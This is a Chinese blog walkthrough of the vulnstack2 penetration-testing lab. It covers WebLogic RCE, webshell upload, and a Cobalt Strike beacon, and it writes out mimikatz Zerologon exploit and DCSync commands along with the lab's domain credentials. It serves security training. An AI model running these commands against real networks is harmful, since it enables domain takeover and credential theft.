vlunstack2靶场

最新推荐文章于 2024-08-14 12:37:07 发布
最新推荐文章于 2024-08-14 12:37:07 发布
阅读量358 收藏 11
点赞数 11
文章标签: 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_70782241/article/details/136108503
版权

一、环境搭建

一共有三台靶机,web,dc,pc,其中web需要出网因此需要设置双网卡且和攻击机kali处于同网段。具体配置如图

WEB:

 

PC:

DC:

kali:

二、外围打点

1.使用nmap扫描web服务器

发现7001 weblogic常用端口

3389远程登陆端口

2.weblogic rce利用

利用weblogic扫描器发现存在weblogic漏洞

利用webshell_generate生成jsp的蚁剑webshell 并利用上面的工具上传shell

地址为

C:\Oracle\Middleware\wlserver_10.3\server\lib\consoleapp\webapp\framework\skins\wlsconsole\images

蚁剑连接地址为

http://ip:port/console/framework/skins/wlsconsole/images/shell.jsp

注意需要重启一下web服务器

其他上传地址参考Weblogic上传shell路径 - 掘金

三、内网渗透

1.利用webshell上线cs

利用cs的 web Delivery生成powershell

注意不要勾选x64这里x64不能成功上线

接着在蚁剑的terminals中执行生成的代码

成功上线

2.提权并进行内网探测

利用梼杌插件的 ms15-051进行提权,提权后进行端口扫描结果如下

通过插件查找域控主机

3.利用zerologon漏洞获取域控密码

利用如下命令查看域控服务器是否存在zerologon漏洞

mimikatz lsadump::zerologon /target:DC.de1ay.com /account:DC$

接着执行

mimikatz lsadump::zerologon /target:DC.de1ay.com /account:DC$ /exploit

继续执行如下命令获取域控服务器登录凭据

mimikatz lsadump::dcsync /domain:de1ay.com /dc:DC.de1ay.com /user:administrator /authuser:DC$ /authdomain:de1ay /authpassword:"" /authntlm

可知登录凭据为1qaz@WSX

4.添加域控主机credential并用PsExec将域内主机上线

在target中进行psexec

类似的可以使其他域控主机上线

Sync-1
关注
  • 11
    点赞
  • 11
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
靶场vulnstack4的搭建
weixin_71169068的博客
11-17 668
搭建靶场vulnstack4
vuInhub靶场实战系列-prime:2
06-08
vuInhub靶场实战系列-prime:2
VulnStack靶场
aming小老弟
04-19 1840
ATT&CK红队评估实战靶场二0x00 靶场搭建防火墙策略运行weblogic启动脚本net view 显示 6118 error0x01 渗透实战 红队实战系列,主要以真实企业环境为实例搭建一系列靶场 本次红队环境 关键词:威胁情报 | 内网渗透 | Kill Chain | 域渗透 | 安全靶场 Bypass UAC Windows系统NTLM获取(理论知识:Windows认证) Access Token利用(MSSQL利用) WMI利用 网页代理,二层代理,特殊协议代理(DNS,I
红日靶场
qq_50696533的博客
12-29 3539
红日靶场4大家好红日安全红队靶场(四)已经出来,本次靶场渗透反序列化漏洞、命令执行漏洞、Tomcat漏洞、MS系列漏洞、端口转发漏洞、以及域渗透等多种组合漏洞,希望大家多多利用。靶场学习路径,可参考 struts2 漏洞利用 tomcat 漏洞利用 phpmyadmin getshell docker逃逸 ms14-068 ssh密钥利用 流量转发 历史命令信息泄露 域渗透。利用永恒之蓝获得win7 mimikatz抓取密码 利用Kerberos 域用户提权漏洞获得域
【红日靶场】vulnstack3-完整渗透过程
信安是不可或缺的一部分!
10-07 811
绕过:https://github.com/yangyangwithgnu/bypass_disablefunc_via_LD_PRELOAD。现在做内网穿透将这台主机代理出来:我测试我这有问题(我的环境有安全设备拦截了msf的流量)再次横向到30主机:(失败)443gg了,应该是授权的问题,这个win7太久没用了激活掉了。脏牛:https://github.com/Rvn0xsy/linux_dirty。还有其他方式可以横向这个看自己爱好,这次先到这,拿到后可以权限维持,这里不在赘述。
红日靶场3
m0_75178803的博客
02-23 1179
在虚拟机的网络编辑器中添加两个仅主机网卡。
ATT&CK靶场系列(六)
qq_1873822的博客
12-21 4411
一、环境配置 vlunstack是红日安全团队出品的一个实战环境,具体介绍请访问:http://vulnstack.qiyuanxuetang.net/vuln/detail/8/
ATT&CK靶场系列(七)
qq_1873822的博客
12-04 7017
一、环境配置 vlunstack是红日安全团队出品的一个实战环境,具体介绍请访问:http://vulnstack.qiyuanxuetang.net/vuln/detail/9/ DMZ区IP段为192.168.1.1/24 第二层网络环境IP段为192.168.52.1/24 第三层网络环境IP段为192.168.93.1/24 按着上面的图片把相关的ip段给配置就行 DMZ区域: 给Ubuntu (Web 1) 配置了两个网卡,一个可以对外提供服务;一个连接第二层网络。 第二层网络区域: 给U
ATT&CK靶场系列(五)
qq_1873822的博客
12-05 3322
一、环境配置 vlunstack是红日安全团队出品的一个实战环境,具体介绍请访问:http://vulnstack.qiyuanxuetang.net/vuln/detail/7/ 虚拟机密码 win7 sun\heart 123.com sun\Administrator dc123.com Win7双网卡模拟内外网 2008 sun\admin 2020.com 网络环境配置如下: 二、前期信息收集 使用nmap对外网ip段进行信息收集 nmap -A -v -T4 192.168.135.15
ATT&CK靶场系列(四)
qq_1873822的博客
11-30 3964
一、环境配置 vlunstack是红日安全团队出品的一个实战环境,具体介绍请访问:http://vulnstack.qiyuanxuetang.net/vuln/detail/6/ 拓扑结构
uploadlabs靶场文件
02-27
2. **PHPStudy**:PHPStudy是一款集成了Apache和PHP环境的集成开发工具,方便开发者在Windows环境下进行PHP开发和测试,它还支持MySQL数据库。 3. **LAMP环境**:LAMP是Linux操作系统、Apache HTTP服务器、MySQL...
开源靶场zsbdzsbd
04-19
2. **渗透测试工具**:了解并掌握常用的渗透测试工具,如Nmap进行端口扫描,Burp Suite抓包分析,Metasploit进行漏洞利用等。 3. **Web应用安全**:深入理解HTTP协议,学习如何识别和利用常见的Web应用安全漏洞,如...
渗透学习 webug4.0靶场
07-12
渗透学习 webug4.0靶场 渗透学习 webug4.0靶场 渗透学习 webug4.0靶场
webgoat靶场需要自行搭建
01-19
2. **Java环境**:WebGoat基于Java开发,因此需要在你的系统上安装Java Development Kit (JDK)。确保你的系统环境变量正确设置了JAVA_HOME,并且能够运行Java命令。 3. **Tomcat应用服务器**:WebGoat通常与Tomcat...
安全:企业上云后不可忽视的安全挑战与解决方案
A526847的博客
08-14 492
企业上云是数字化转型的必然趋势,但云安全风险也如影随形。企业必须正视云安全挑战,采取切实有效的措施来保障云安全。通过数据加密、访问控制、安全审计、备份与恢复、灾备管理、选择可信的云服务供应商和加强内部安全管理等手段,企业可以构建完善的云安全体系,确保云服务的可靠性和安全性。在未来的数字化转型中,云安全将成为企业不可或缺的重要保障。
Linux安全与高级应用(十三)深入解析Linux中的rsync远程同步:原理、配置与应用
洛秋的博客
08-13 980
1.1 rsync的基本原理rsync(Remote Sync)是一种用于本地或远程的文件同步工具。与传统的文件拷贝工具不同,rsync的核心优势在于其增量同步的特性,即只传输源和目标之间不同的文件部分,极大地减少了数据传输量。rsync支持通过SSH或直接使用rsync协议进行数据同步,这使得它在跨网络的大数据备份中表现尤为出色。1.2 rsync的优势增量备份:只同步差异文件或文件的变化部分,大幅减少网络传输量和时间。安全性:通过SSH加密通道进行传输,保障数据的安全。灵活性。
什么是网络安全态势感知
m0_66268916的博客
08-13 388
德迅云安全 态势感知采用先进大数据架构,通过采集系统的网络安全数据信息,对所有安全数据进行统一处理分析,实现对网络攻击行为、安全威胁事件、日志、流量等网络安全问题的发现和告警,打造安全可监控、威胁可感知、事件可控制的安全能力。态势感知是一种基于环境的、动态、整体地洞悉安全风险的能力,是以安全大数据为基础,从全局视角提升对安全威胁的发现识别、理解分析、响应处置能力的一种方式、最终是为了决策与行动,是安全能力的落地。通过列表、搜索、详情等方式对告警进行展示,支持告警溯源和攻击链分析,让每一次攻击都无处可藏。
Ghidra:开源软件逆向工程框架
最新发布
网络研究观
08-14 447
Ghidra 是一种尖端的开源软件逆向工程 (SRE) 框架,是美国国家安全局 (NSA) 研究局的产品。
kali2021.3安装DVWA靶场教程
"kali2021.3安装dvwa靶场" 在本文中,我们将详细探讨如何在Kali Linux 2021.3版本上安装DVWA(Damn Vulnerable Web Application)靶场,这对于初学者进行Web渗透测试是非常有帮助的。DVWA是一个开源的、易受攻击的...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值